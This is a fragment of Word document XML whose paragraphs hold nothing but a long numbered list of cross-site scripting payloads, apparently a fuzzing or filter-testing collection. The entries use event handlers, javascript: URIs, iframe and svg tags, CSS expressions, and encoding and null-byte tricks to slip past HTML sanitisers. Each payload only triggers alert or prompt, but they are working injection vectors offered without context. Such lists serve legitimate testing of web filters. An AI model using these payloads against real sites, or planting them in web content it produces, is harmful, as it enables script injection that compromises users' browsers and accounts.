    <w:p w14:paraId="63DFE6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onratechange="alert(1121))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA992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onseeked="alert(1122))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F5B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onseeking="alert(1123))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C5E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onstalled="alert(1124))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595001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onsuspend="alert(1125))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48B0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ontimeupdate="alert(1126))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE94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onvolumechange="alert(1127))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C790B2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onwaiting="alert(1128))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE873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onshow="alert(1129))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248699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ontoggle="alert(1130))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC7569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onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1131)";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51C8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onload="alert(1132))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58777BB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TYPE="BUTTON" action="alert(1133)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD130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SRC="javascript:alert(1134);"&gt;&lt;/IFRAME&gt;"&gt;123&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F70D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SRC=# onmouseover="alert(1135)"&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250904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SRC="javascript:alert(1136);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F240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SRC=# onmouseover="alert(1137)"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199825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SRC=# onmouseover="alert(1138)"&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD908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"&gt;&lt;/iframe&gt;&lt;script&gt;alert(1139);&lt;/script&gt;&lt;iframe frameborder="0%EF%BB%BF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AB57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width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1140)"&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8043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&lt;IFRAME width="420" height="315" frameborder="0" onload="alert(1141)"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A701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SRC="javascript:alert(1142);"&gt;&lt;/IFRAME&gt;"&gt;123&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E94E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"&gt;&lt;h1&gt;&lt;IFRAME SRC=# onmouseover="alert(1143)"&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B68C31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SRC="javascript:alert(1144);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11A3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SRC=# onmouseover="alert(1145)"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B929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src=``&amp;NewLine; onerror=alert(1146)&amp;NewLine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A1D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/**/&gt;/**/alert(1147)/**/&lt;/script /**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9A0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&lt;iframe/src="data:text/html,&lt;svg &amp;#114811481148;&amp;#114811480;load=alert(1148)&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE2A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content="&amp;NewLine; 1149 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1149)" http-equiv="refresh"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDAD9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&lt;form&gt;&lt;iframe &amp;#09;&amp;#11500;&amp;#11501150; src="javascript&amp;#58;alert(1150)"&amp;#11501150;&amp;#11500;&amp;#09;;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE51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http://www.google&lt;script .com&gt;alert(1151)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F6663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^__^&gt;alert(1152))&lt;/script ^__^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC46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&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(1153)/**/&lt;/script &amp;#32; :-(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE062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&amp;#00;&lt;/form&gt;&lt;input type&amp;#61154;"date" onfocus="alert(1154)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674163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href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(1155)&amp;NewLine;&gt;X&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528FB0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~~~&gt;alert(1156)&lt;/script ~~~&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72F3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&lt;iframe// src=javaSCRIPT&amp;colon;alert(1157)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E045A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&lt;%&lt;!--'%&gt;&lt;script&gt;alert(1158);&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38205C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src="data:text/javascript,alert(1159)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9171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&lt;iframe/onreadystatechange=alert(1160)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3B5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&lt;svg/onload=alert(1161)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F10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type="text" value=`` &lt;div/onmouseover='alert(1162)'&gt;X&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BD7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http://www.&lt;script&gt;alert(1163)&lt;/script .com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBBC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?&gt;alert(1164)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5E0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src=`xx:xx`onerror=alert(1165)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F88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content="0;javascript&amp;colon;alert(1166)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BD8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&lt;script&gt;+-+-1167-+-+alert(1167)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0A1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&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#11680alert(1168)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD656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itworksinallbrowsers&gt;/*&lt;script* */alert(1169)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2C1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?itworksonchrome?\/onerror = alert(1170)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B967A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onlypossibleinopera:-)&gt; alert(1171)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA5C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x&gt; alert(1172) &lt;/script 1172=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E20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&lt;div/onmouseover='alert(1173)'&gt; style="x:"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE00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&lt;--`&lt;img/src=` onerror=alert(1174)&gt; --!&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055CD3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style="position:absolute;top:0;left:0;width:117500%;height:117500%" onmouseover="prompt(1175)" onclick="alert(1175)"&gt;x&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B27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formaction=javascript&amp;colon;alert(1176)&gt;CLICKME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD55B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&lt;script\x20type="text/javascript"&gt;javascript:alert(1177);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3432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&lt;script\x3Etype="text/javascript"&gt;javascript:alert(1178);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66794A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&lt;script\x0Dtype="text/javascript"&gt;javascript:alert(1179);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D64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&lt;script\x09type="text/javascript"&gt;javascript:alert(1180);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B58D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&lt;script\x0Ctype="text/javascript"&gt;javascript:alert(1181);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100314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&lt;script\x2Ftype="text/javascript"&gt;javascript:alert(1182);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E6B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&lt;script\x0Atype="text/javascript"&gt;javascript:alert(1183);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACF2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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(1184)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE946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'`"&gt;&lt;\x00script&gt;javascript:alert(1185)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233AEB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src=1186 href=1186 onerror="javascript:alert(1186)"&gt;&lt;/img&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F9D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&lt;audio src=1187 href=1187 onerror="javascript:alert(1187)"&gt;&lt;/audio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE8D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src=1188 href=1188 onerror="javascript:alert(1188)"&gt;&lt;/video&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85EA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src=1189 href=1189 onerror="javascript:alert(1189)"&gt;&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8687D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&lt;image src=1190 href=1190 onerror="javascript:alert(1190)"&gt;&lt;/image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A151D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src=1191 href=1191 onerror="javascript:alert(1191)"&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07117AD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src=1192 href=1192 onerror="javascript:alert(1192)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A29D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onResize svg onResize="javascript:javascript:alert(1193)"&gt;&lt;/svg onResize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91E87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&lt;title onPropertyChange title onPropertyChange="javascript:javascript:alert(1194)"&gt;&lt;/title onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190D7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onLoad iframe onLoad="javascript:javascript:alert(1195)"&gt;&lt;/iframe onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9EBC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onMouseEnter body onMouseEnter="javascript:javascript:alert(1196)"&gt;&lt;/body onMouseEnter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A96C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onFocus body onFocus="javascript:javascript:alert(1197)"&gt;&lt;/body onFocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC27D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onScroll frameset onScroll="javascript:javascript:alert(1198)"&gt;&lt;/frameset onScroll&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A62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onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1199)"&gt;&lt;/script onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447EE0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onMouseUp html onMouseUp="javascript:javascript:alert(1200)"&gt;&lt;/html onMouseUp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528377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onPropertyChange body onPropertyChange="javascript:javascript:alert(1201)"&gt;&lt;/body onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187973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 svg onLoad="javascript:javascript:alert(1202)"&gt;&lt;/svg onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06586A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onPageHide body onPageHide="javascript:javascript:alert(1203)"&gt;&lt;/body onPageHide&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E94E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onMouseOver body onMouseOver="javascript:javascript:alert(1204)"&gt;&lt;/body onMouseOver&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C3C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onUnload body onUnload="javascript:javascript:alert(1205)"&gt;&lt;/body onUnload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4859E4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 body onLoad="javascript:javascript:alert(1206)"&gt;&lt;/body onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B03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onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1207)"&gt;&lt;/bgsound onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8E4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onMouseLeave html onMouseLeave="javascript:javascript:alert(1208)"&gt;&lt;/html onMouseLeave&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598CE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onMouseWheel html onMouseWheel="javascript:javascript:alert(1209)"&gt;&lt;/html onMouseWheel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A03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onLoad style onLoad="javascript:javascript:alert(1210)"&gt;&lt;/style onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B432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onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1211)"&gt;&lt;/iframe onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1158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onPageShow body onPageShow="javascript:javascript:alert(1212)"&gt;&lt;/body onPageShow&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684BF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onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1213)"&gt;&lt;/style onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA97C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&lt;frameset onFocus frameset onFocus="javascript:javascript:alert(1214)"&gt;&lt;/frameset onFocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A257EB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onError applet onError="javascript:javascript:alert(1215)"&gt;&lt;/applet onError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7A2B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onStart marquee onStart="javascript:javascript:alert(1216)"&gt;&lt;/marquee onStart&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC5BD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onLoad script onLoad="javascript:javascript:alert(1217)"&gt;&lt;/script onLoad&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB9D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onMouseOver html onMouseOver="javascript:javascript:alert(1218)"&gt;&lt;/html onMouseOver&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C98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onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1219)"&gt;&lt;/html onMouseEnter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028664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onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1220)"&gt;&lt;/body onBeforeUnload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C80D1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onMouseDown html onMouseDown="javascript:javascript:alert(1221)"&gt;&lt;/html onMouseDown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAA3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 onScroll marquee onScroll="javascript:javascript:alert(1222)"&gt;&lt;/marquee onScroll&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A5F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&lt;xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1223)"&gt;&lt;/xml onPropertyChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542049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onBlur frameset onBlur="javascript:javascript:alert(1224)"&gt;&lt;/frameset onBlur&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B31A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onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1225)"&gt;&lt;/applet onReadyStateChange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73092D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onUnload svg onUnload="javascript:javascript:alert(1226)"&gt;&lt;/svg onUnload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4213005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onMouseOut html onMouseOut="javascript:javascript:alert(1227)"&gt;&lt;/html onMouseOut&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E015D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onMouseMove body onMouseMove="javascript:javascript:alert(1228)"&gt;&lt;/body onMouseMove&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A0B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onResize body onResize="javascript:javascript:alert(1229)"&gt;&lt;/body onResize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1049B1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onError object onError="javascript:javascript:alert(1230)"&gt;&lt;/object onError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762C86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onPopState body onPopState="javascript:javascript:alert(1231)"&gt;&lt;/body onPopState&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25374D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onMouseMove html onMouseMove="javascript:javascript:alert(1232)"&gt;&lt;/html onMouseMove&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C59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onreadystatechange applet onreadystatechange="javascript:javascript:alert(1233)"&gt;&lt;/applet onreadystatechange&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A68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onpagehide body onpagehide="javascript:javascript:alert(1234)"&gt;&lt;/body onpagehide&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F5A2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onunload svg onunload="javascript:javascript:alert(1235)"&gt;&lt;/svg onunload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255F2E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&lt;applet onerror applet onerror="javascript:javascript:alert(1236)"&gt;&lt;/applet onerror&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F879A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onkeyup body onkeyup="javascript:javascript:alert(1237)"&gt;&lt;/body onkeyup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20459E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onunload body onunload="javascript:javascript:alert(1238)"&gt;&lt;/body onunload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB563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onload iframe onload="javascript:javascript:alert(1239)"&gt;&lt;/iframe onload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457CAC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 body onload="javascript:javascript:alert(1240)"&gt;&lt;/body onload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B411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onmouseover html onmouseover="javascript:javascript:alert(1241)"&gt;&lt;/html onmouseover&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CCA8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onbeforeload object onbeforeload="javascript:javascript:alert(1242)"&gt;&lt;/object onbeforeload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759055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&lt;body onbeforeunload body onbeforeunload="javascript:javascript:alert(1243)"&gt;&lt;/body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>onbeforeunload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2FDBE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onfocus body onfocus="javascript:javascript:alert(1244)"&gt;&lt;/body onfocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40136D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onkeydown body onkeydown="javascript:javascript:alert(1245)"&gt;&lt;/body onkeydown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F5B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onbeforeload iframe onbeforeload="javascript:javascript:alert(1246)"&gt;&lt;/iframe onbeforeload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336D21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 iframe src="javascript:javascript:alert(1247)"&gt;&lt;/iframe src&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4AD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 onload svg onload="javascript:javascript:alert(1248)"&gt;&lt;/svg onload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A93E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onmousemove html onmousemove="javascript:javascript:alert(1249)"&gt;&lt;/html onmousemove&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4E8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onblur body onblur="javascript:javascript:alert(1250)"&gt;&lt;/body onblur&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E774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\x3Cscript&gt;javascript:alert(1251)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A46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'"`&gt;&lt;script&gt;/* *\x2Fjavascript:alert(1252)// */&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632CD7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&lt;script&gt;javascript:alert(1253)&lt;/script\x0D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4442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&lt;script&gt;javascript:alert(1254)&lt;/script\x0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ABBA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&lt;script&gt;javascript:alert(1255)&lt;/script\x0B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522727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charset="\x22&gt;javascript:alert(1256)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43158B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&lt;!--\x3E&lt;img src=xxx:x onerror=javascript:alert(1257)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9214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---&gt; &lt;img src=xxx:x onerror=javascript:alert(1258)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F1A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--\x00&gt; &lt;img src=xxx:x onerror=javascript:alert(1259)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348EFD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--\x21260&gt; &lt;img src=xxx:x onerror=javascript:alert(1260)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502562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--&gt;&lt;!-- --\x3E&gt; &lt;img src=xxx:x onerror=javascript:alert(1261)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45434A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src='#\x27 onerror=javascript:alert(1262)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41951F0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href="javascript\x3Ajavascript:alert(1263)" id="fuzzelement1263"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D30D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"'`&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a='hello\x27;javascript:alert(1264)//';&lt;/script&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6106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href="javas\x00cript:javascript:alert(1265)" id="fuzzelement1265"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0B7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href="javas\x07cript:javascript:alert(1266)" id="fuzzelement1266"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA13A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href="javas\x0Dcript:javascript:alert(1267)" id="fuzzelement1267"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C0D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href="javas\x0Acript:javascript:alert(1268)" id="fuzzelement1268"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D3B55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href="javas\x08cript:javascript:alert(1269)" id="fuzzelement1269"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDFE9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href="javas\x02cript:javascript:alert(1270)" id="fuzzelement1270"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550ABD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href="javas\x03cript:javascript:alert(1271)" id="fuzzelement1271"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182365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href="javas\x04cript:javascript:alert(1272)" id="fuzzelement1272"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F187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href="javas\x01273cript:javascript:alert(1273)" id="fuzzelement1273"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF094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href="javas\x05cript:javascript:alert(1274)" id="fuzzelement1274"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648794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href="javas\x0Bcript:javascript:alert(1275)" id="fuzzelement1275"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404836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href="javas\x09cript:javascript:alert(1276)" id="fuzzelement1276"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C986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href="javas\x06cript:javascript:alert(1277)" id="fuzzelement1277"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80AC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href="javas\x0Ccript:javascript:alert(1278)" id="fuzzelement1278"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59674E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&lt;script&gt;/* *\x2A/javascript:alert(1279)// */&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CD30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&lt;script&gt;/* *\x00/javascript:alert(1280)// */&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A79B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&lt;style&gt;&lt;/style\x3E&lt;img src="about:blank" onerror=javascript:alert(1281)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E7B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&lt;style&gt;&lt;/style\x0D&lt;img src="about:blank" onerror=javascript:alert(1282)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4AF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&lt;style&gt;&lt;/style\x09&lt;img src="about:blank" onerror=javascript:alert(1283)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1045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&lt;style&gt;&lt;/style\x20&lt;img src="about:blank" onerror=javascript:alert(1284)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F71A5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&lt;style&gt;&lt;/style\x0A&lt;img src="about:blank" onerror=javascript:alert(1285)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DA822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"'`&gt;ABC&lt;div style="font-family:'foo'\x7Dx:expression(javascript:alert(1286);/*';"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABF94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"'`&gt;ABC&lt;div style="font-family:'foo'\x3Bx:expression(javascript:alert(1287);/*';"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7D1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&lt;script&gt;if("x\\xE1288\x96\x89".length==2) { javascript:alert(1288);}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29F6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&lt;script&gt;if("x\\xE0\xB9\x92".length==2) { javascript:alert(1289);}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E46A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&lt;script&gt;if("x\\xEE\xA9\x93".length==2) { javascript:alert(1290);}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC60F2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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(1291)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F2F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'`"&gt;&lt;\x00script&gt;javascript:alert(1292)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541296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"'`&gt;&lt;\x3Cimg src=xxx:x onerror=javascript:alert(1293)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68356D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"'`&gt;&lt;\x00img src=xxx:x onerror=javascript:alert(1294)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B77C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src="data:text/plain\x2Cjavascript:alert(1295)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E331D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src="data:\xD4\x8F,javascript:alert(1296)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0DC1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src="data:\xE0\xA4\x98,javascript:alert(1297)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC0B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src="data:\xCB\x8F,javascript:alert(1298)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151881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&lt;script\x20type="text/javascript"&gt;javascript:alert(1299);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682458A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&lt;script\x3Etype="text/javascript"&gt;javascript:alert(1300);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556B0DE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&lt;script\x0Dtype="text/javascript"&gt;javascript:alert(1301);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07008E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&lt;script\x09type="text/javascript"&gt;javascript:alert(1302);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B776B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&lt;script\x0Ctype="text/javascript"&gt;javascript:alert(1303);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F639B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&lt;script\x2Ftype="text/javascript"&gt;javascript:alert(1304);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C09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&lt;script\x0Atype="text/javascript"&gt;javascript:alert(1305);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F11FE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style="x\x3Aexpression(javascript:alert(1306)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C0AB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style="x:expression\x5C(javascript:alert(1307)"&gt;DEF</w:t>
      </w:r>
    </w:p>
